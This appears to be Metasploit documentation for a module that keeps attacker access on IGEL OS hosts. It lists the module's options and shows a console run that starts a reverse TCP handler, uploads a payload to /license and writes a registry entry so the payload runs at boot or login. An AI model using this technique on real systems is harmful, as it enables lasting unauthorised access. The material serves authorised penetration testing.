1.2 KiB
1.2 KiB
Vulnerable Application
IGEL OS with a shell or meterpreter session.
Verification Steps
- Get a
shellormeterpretersession on an IGEL OS host - Use:
use exploit/linux/persistence/igel_persistence - Set:
set SESSION <id>, replacing<id>with the session ID - Set payload options, e.g.
LHOST - Exploit:
run - The payload is executed on next boot/login (dependent on
REGISTRY_KEY)
Options
| Name | Description |
|---|---|
| REGISTRY_KEY | Registry key to use for automatically executing payload |
| REGISTRY_ONLY | Set whether to store payload in registry |
| TARGET_DIR | Directory to write payload |
Scenarios
msf exploit(linux/persistence/igel_persistence) > set SESSION 2
SESSION => 2
msf exploit(linux/persistence/igel_persistence) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(linux/persistence/igel_persistence) > run
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Uploading payload to /license
[*] Writing persistence to registry
[*] Exploit completed, but no session was created.